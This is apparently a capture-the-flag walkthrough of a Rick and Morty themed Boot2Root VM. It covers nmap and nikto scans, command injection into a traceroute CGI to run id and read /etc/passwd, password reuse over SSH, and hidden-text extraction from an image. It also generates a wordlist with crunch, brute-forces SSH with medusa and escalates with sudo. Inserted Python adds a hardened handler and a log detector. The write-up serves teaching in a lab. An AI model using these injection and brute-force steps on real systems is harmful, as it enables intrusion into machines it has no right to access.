rick

A simple Rick and Morty themed Boot2Root.

goal: collect 130 points + get root.

ip —> 192.168.1.41

sudo nmap -sS -sV -A -T4 192.168.1.41 -p-

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-03 21:10 +03
Nmap scan report for 192.168.1.41
Host is up (0.00035s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.1.35
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?
| fingerprint-strings:
|   NULL:
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    Cockpit web service
|_http-title: Did not follow redirect to https://192.168.1.41:9090/
13337/tcp open  unknown
| fingerprint-strings:
|   NULL:
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open  unknown
| fingerprint-strings:
|   NULL, ibm-db2:
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.60%I=7%D=12/3%Time=5A243E00%P=x86_64-pc-linux-gnu%r(NULL
SF:,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.4
SF:\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.60%I=7%D=12/3%Time=5A243E00%P=x86_64-pc-linux-gnu%r(N
SF:ULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.60%I=7%D=12/3%Time=5A243E06%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.
SF:\.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20re
SF:verse\x20shell\.\.\.\n#\x20");
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
...

ports 60000, 13337, 9090, 80, 22 and 21 are open. some of the ports leak their banners

I connect to port 60000 with netcat

nc 192.168.1.41 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points

10 points so far

the flag that will come from port 13337 (see above) is already visible in the nmap output.

-AND WHAT IF IT WASN'T VISIBLE??

then let's explain, if you like

-DO WE HAVE TO TELL YOU EVERYTHING

got it, bro...

nc 192.168.1.41 13337
FLAG:{TheyFoundMyBackDoorMorty}-10Points

on port 9090 there is something called the Cockpit web service.

when I open it I see the flag

FLAG {There is no Zeus, in your face!} – 10 Points

-THERE'S A LOGIN PAGE HERE TOO, ARE YOU TRYING TO FOOL US?

how should I know

for port 80 I go to 192.168.1.41 in the browser

since it's not a hard vm I could have done this manually, but it's still useful to see nikto's output

nikto -h http://192.168.1.41/
...
+ Server: Apache/2.4.27 (Fedora)
...
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
...
+ 1 host(s) tested

robots.txt and cgi-bin did not show up

more results could have been found with dirbuster.

under 192.168.1.41/passwords/ there are 2 files, FLAG.txt and passwords.html; passwords.html contains some stale jokes

Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.
<!--Password: winter-->

FLAG.txt contains the flag.

FLAG{Yeah d- just don't do it.} - 10 Points

the contents of 192.168.1.41/robots.txt are a bit stale too:

They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*

contents of root_shell.cgi:

--UNDER CONSTRUCTION--
<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->

the real action happens in /cgi-bin/tracertool.cgi.

(screenshot of the tracertool.cgi page)

when I give 192.168.1.32 as the ip, it returns

traceroute to 192.168.1.32 (192.168.1.32), 30 hops max, 60 byte packets

so judging by that output, this is the traceroute command on linux

and it takes the target via the GET method, in the ip parameter

so when I enter this ip, on the server

traceroute 192.168.1.32

is the command that runs

then, with the simplest method, I can try to run another command next to it

for this I change the ip parameter to 192.168.1.32;id

if there is no filter blocking the ';' character

the server will first run traceroute 192.168.1.32 and then

the id command.

the output of the url http://192.168.1.41/cgi-bin/tracertool.cgi?ip=192.168.1.32;id:

traceroute to 192.168.1.32 (192.168.1.32), 30 hops max, 60 byte packets
 1  localhost.localdomain (192.168.1.41)  3098.914 ms !H  3096.421 ms !H  3096.411 ms !H
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t:s0

both commands ran.
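To make the root cause of this step concrete, here is an added example (not the VM's tracertool.cgi, whose source is not shown in the writeup; the function names and the access-log lines are made up for illustration). It models the vulnerable handler, shows how the shell splits the injected line into two commands, gives a hardened replacement that validates the parameter as an IP literal and calls traceroute without a shell, and runs a small detection pass over constructed Apache access-log lines.

```python
# Added example: model of the command-injection flaw in a traceroute CGI and a
# hardened replacement. Not the VM's own code; names are hypothetical.
import ipaddress
import shlex
import subprocess
from urllib.parse import unquote


def build_vulnerable_command(ip: str) -> str:
    """What the writeup infers: the GET parameter is pasted into a shell line.
    Blacklisting words (the VM swaps 'cat' for ASCII art) does not help, since
    'more', 'less', 'head' and friends still work."""
    return "traceroute " + ip


def shell_command_groups(cmd: str) -> list:
    """Split a line the way sh would, to show how many commands really run.
    With punctuation_chars=True shlex returns ';', '&&', '||', '|' as tokens."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    groups, current = [], []
    for tok in lexer:
        if tok in (";", "&&", "||", "|", "&"):
            if current:
                groups.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        groups.append(current)
    return groups


def is_valid_target(ip: str) -> bool:
    """Allow-list check: only an IPv4/IPv6 literal is acceptable; hostnames and
    anything containing shell metacharacters fail the parse."""
    try:
        ipaddress.ip_address(ip.strip())
        return True
    except ValueError:
        return False


def build_safe_argv(ip: str) -> list:
    """argv for subprocess.run(..., shell=False): no shell parses the line, so a
    metacharacter would just be part of one argument that traceroute rejects."""
    if not is_valid_target(ip):
        raise ValueError(f"rejected traceroute target: {ip!r}")
    return ["traceroute", ip.strip()]


def run_traceroute(ip: str) -> subprocess.CompletedProcess:
    """Hardened handler body: validated argv, no shell, bounded runtime."""
    return subprocess.run(build_safe_argv(ip), capture_output=True, text=True,
                          timeout=60, check=False)


# Detection side: constructed access-log lines (not from the VM) with a normal
# request, the ';id' probe and a URL-encoded variant of the passwd read.
SAMPLE_ACCESS_LOG = [
    '192.168.1.35 - - [03/Dec/2017:21:30:01 +0300] "GET /cgi-bin/tracertool.cgi?ip=192.168.1.32 HTTP/1.1" 200 512',
    '192.168.1.35 - - [03/Dec/2017:21:31:12 +0300] "GET /cgi-bin/tracertool.cgi?ip=192.168.1.32;id HTTP/1.1" 200 640',
    '192.168.1.35 - - [03/Dec/2017:21:32:45 +0300] "GET /cgi-bin/tracertool.cgi?ip=192.168.1.32%3Bmore%20/etc/passwd HTTP/1.1" 200 2048',
    '192.168.1.35 - - [03/Dec/2017:21:33:00 +0300] "GET /index.html HTTP/1.1" 200 1024',
]


def suspicious_tracertool_requests(lines: list) -> list:
    """Return every 'ip' value sent to tracertool.cgi that is not a bare IP.
    The query is split by hand: urllib.parse.parse_qs on Python < 3.9.2 treats
    ';' as a separator and would silently drop the injected part."""
    hits = []
    for line in lines:
        try:
            target = line.split('"')[1].split()[1]  # '/path?query' of the request
        except IndexError:
            continue
        path, _, query = target.partition("?")
        if not path.endswith("/tracertool.cgi"):
            continue
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            if key == "ip" and not is_valid_target(unquote(value)):
                hits.append(unquote(value))
    return hits


if __name__ == "__main__":
    print(shell_command_groups(build_vulnerable_command("192.168.1.32;id")))
    print(build_safe_argv("192.168.1.32"))
    print(suspicious_tracertool_requests(SAMPLE_ACCESS_LOG))
```

The fix is the pair of allow-list validation and shell-free execution; either alone leaves a gap (validation alone still runs through a shell, a list argv alone still lets a hostname reach traceroute's own option parsing). The detection function reuses the same validator, so the rule that guards the endpoint is the rule that flags its abuse in the logs.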

since I need to find out which users exist on the system

I give 192.168.1.32;cat /etc/passwd as the ip value

traceroute to 192.168.1.32 (192.168.1.32), 30 hops max, 60 byte packets
 1  localhost.localdomain (192.168.1.41)  3101.921 ms !H  3099.147 ms !H  3099.130 ms !H
                         _
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/

they replaced the cat command with ascii art, nice.

I use more instead of cat

...
::::::::::::::
/etc/passwd
::::::::::::::
...
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
...
# only showing the users that are useful to me

port 22 doesn't work, but port 22222 does

the question is whether I have enough information for ssh

there are 3 users, RickSanchez, Morty and Summer, and the password winter that I found earlier.

winter could be Summer's password

ssh [email protected] -p 22222
[email protected]'s password:
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
[[email protected] ~]$

success.

[[email protected] ~]$ ls -la
total 20
drwx------. 2 Summer Summer  99 Sep 15 11:49 .
drwxr-xr-x. 5 root   root    52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer   1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer  18 May 30  2017 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30  2017 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30  2017 .bashrc
-rw-rw-r--. 1 Summer Summer  48 Aug 22 02:46 FLAG.txt
[[email protected] ~]$ more FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points
[[email protected] ~]$ cd ..
[[email protected] home]$ ls
Morty  RickSanchez  Summer
[[email protected] home]$ cd Morty
[[email protected] Morty]$ ls -la
total 64
drwxr-xr-x. 2 Morty Morty   131 Sep 15 11:49 .
drwxr-xr-x. 5 root  root     52 Aug 18 18:20 ..
-rw-------. 1 Morty Morty     1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Morty Morty    18 May 30  2017 .bash_logout
-rw-r--r--. 1 Morty Morty   193 May 30  2017 .bash_profile
-rw-r--r--. 1 Morty Morty   231 May 30  2017 .bashrc
-rw-r--r--. 1 root  root    414 Aug 22 03:06 journal.txt.zip
-rw-r--r--. 1 root  root  43145 Aug 22 03:04 Safe_Password.jpg
[[email protected] Morty]$ cp journal.txt.zip ~/
[[email protected] Morty]$ cp Safe_Password.jpg ~/
[[email protected] Morty]$ exit
logout
Connection to 192.168.1.41 closed.

I copied the files I found in Morty's home directory into Summer's home directory; I'll pull them to my own machine with scp

scp -P 22222 [email protected]:/home/Summer/Safe_Password.jpg ~
scp -P 22222 [email protected]:/home/Summer/journal.txt.zip ~

Safe_Password.jpg is a picture of rick; first I look at the exif data

exiftool Safe_Password.jpg

nothing useful in the output

I try the strings command, some text may have been appended to the file.

strings Safe_Password.jpg
...
The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
...
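What strings did here is worth seeing in code. The following is an added example, not part of the writeup: a minimal re-implementation of strings(1) run over a constructed byte string that imitates a JPEG with the hint from above embedded in it (it is not the real Safe_Password.jpg), plus a keyword filter of the kind used when triaging an image for leaked credentials. Function names are made up for illustration.

```python
# Added example: how strings(1) finds text inside a binary file. The sample
# bytes are constructed for this example and are not the VM's Safe_Password.jpg.
import re

# A printable-ASCII run; the length filter is applied per match below.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]+")

# Constructed sample: JPEG-looking header bytes, a bit of binary noise, a text
# blob such as a comment segment might hold, then the end-of-image marker.
SAMPLE_IMAGE = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x48\x00\x48\x00\x00"
    + b"\xff\xdb\x00\x43\x00\x08\x06\x06\x07"
    + b"\xff\xfeThe Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek\x00"
    + b"\x07\x08\x0a\x0c\x14\r\x0c\x0b\x0b\xff\xd9"
)


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return every run of printable ASCII at least min_len bytes long, in file
    order; min_len=4 matches the default of the strings tool."""
    return [m.group().decode("ascii")
            for m in PRINTABLE_RUN.finditer(data)
            if len(m.group()) >= min_len]


def secret_hints(found: list, keywords=("password", "passwd", "secret", "key:")) -> list:
    """Keep only the runs containing a credential-ish keyword, case-insensitively;
    on a real image most runs are segment names and encoder noise."""
    return [s for s in found if any(k in s.lower() for k in keywords)]


if __name__ == "__main__":
    for s in extract_strings(SAMPLE_IMAGE):
        print(s)
    print("hints:", secret_hints(extract_strings(SAMPLE_IMAGE)))
```

The length threshold is what keeps the output readable: with min_len=4 the JFIF marker name survives alongside the hint, and raising it to 5 drops the marker and leaves only the appended text.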

now that I have the password for journal.txt.zip:

cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points

we got both a flag and a password belonging to rick.

time to look at RickSanchez's files

[[email protected] ~]$ cd ../RickSanchez/
[[email protected] RickSanchez]$ ls
RICKS_SAFE  ThisDoesntContainAnyFlags
[[email protected] RickSanchez]$ ls -larh
total 12K
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 ThisDoesntContainAnyFlags
drwxr-xr-x. 2 RickSanchez RickSanchez  18 Sep 21 09:50 RICKS_SAFE
-rw-r--r--. 1 RickSanchez RickSanchez 231 May 30  2017 .bashrc
-rw-r--r--. 1 RickSanchez RickSanchez 193 May 30  2017 .bash_profile
-rw-r--r--. 1 RickSanchez RickSanchez  18 May 30  2017 .bash_logout
drwxr-xr-x. 5 root        root         52 Aug 18 18:20 ..
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 .
[[email protected] RickSanchez]$ cd ThisDoesntContainAnyFlags/
[[email protected] ThisDoesntContainAnyFlags]$ ls
NotAFlag.txt
[[email protected] ThisDoesntContainAnyFlags]$ more NotAFlag.txt
hhHHAaaaAAGgGAh. You totally fell for it... Classiiiigihhic.
But seriously this isn't a flag..
[[email protected] ThisDoesntContainAnyFlags]$ cd ../RICKS_SAFE/
[[email protected] RICKS_SAFE]$ ls -larh
total 12K
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe
drwxr-xr-x. 4 RickSanchez RickSanchez  113 Sep 21 10:30 ..
drwxr-xr-x. 2 RickSanchez RickSanchez   18 Sep 21 09:50 .
[[email protected] RICKS_SAFE]$ cp safe ~/
[[email protected] RICKS_SAFE]$ exit
logout
scp -P 22222 [email protected]:/home/Summer/safe ~
./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
//// ENOUGH ALREADY, ENOUGH, DAMN IT, ENOUGHHHH
./safe 131333
decrypt: 	FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order
1 uppercase character
1 digit
One of the words in my old bands name.

one more flag, plus hints for a password.

the plan that forms in my head:

find the name of the band mentioned; generate a wordlist with a wordlist generator such as crunch; find RickSanchez's password with a tool that can brute-force logins, such as hydra or medusa; finally log in as that user over ssh.

(The band's name is The Flesh Curtains)

crunch 10 10 -t ,%Curtains > ricks.list
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch 7 7 -t ,%Flesh > ricks2.list
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
medusa -h 192.168.1.41 -u RickSanchez -P ~/ricks.list -n 22222 -M ssh
...
...
ACCOUNT FOUND: [ssh] Host: 192.168.1.41 User: RickSanchez Password: P7Curtains [SUCCESS]
ssh [email protected] -p 22222
[[email protected] RICKS_SAFE]$ sudo su
[[email protected] RICKS_SAFE]# cd
[[email protected] ~]# ls -larh
total 36K
-rw-r--r--.  1 root root  129 Feb 12  2017 .tcshrc
drwx------.  2 root root   25 Aug 22 08:21 .ssh
drwxr-----.  3 root root   19 Aug 21 17:35 .pki
-rw-------.  1 root root   32 Aug 22 10:16 .lesshst
-rw-r--r--.  1 root root   40 Aug 22 07:37 FLAG.txt
-rw-r--r--.  1 root root  100 Feb 12  2017 .cshrc
-rw-r--r--.  1 root root  176 Feb 12  2017 .bashrc
-rw-r--r--.  1 root root  176 Feb 12  2017 .bash_profile
-rw-r--r--.  1 root root   18 Feb 12  2017 .bash_logout
-rw-------.  1 root root    7 Sep 15 11:51 .bash_history
-rw-------.  1 root root 1.2K Aug 18 18:16 anaconda-ks.cfg
dr-xr-xr-x. 17 root root  236 Aug 18 19:16 ..
dr-xr-x---.  4 root root  191 Aug 25 14:30 .
[[email protected] ~]# more FLAG.txt
FLAG: {Ionic Defibrillator} - 30 points

got root, but still 10 points short. I haven't looked at port 21

port 21 allows anonymous ftp login, I had seen that in the nmap output.

ftp 192.168.1.41
Connected to 192.168.1.41.
220 (vsFTPd 3.0.3)
Name (192.168.1.41:d1scharg3d): anonymous    
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -larh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
-rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
drwxr-xr-x    3 0        0              33 Aug 22 05:10 ..
drwxr-xr-x    3 0        0              33 Aug 22 05:10 .
226 Directory send OK.
ftp> get FLAG.TXT
local: FLAG.TXT remote: FLAG.TXT
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -larh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        0              33 Aug 22 05:10 ..
drwxr-xr-x    2 0        0               6 Feb 12  2017 .
226 Directory send OK.
ftp> exit
221 Goodbye.
cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Point

bye bye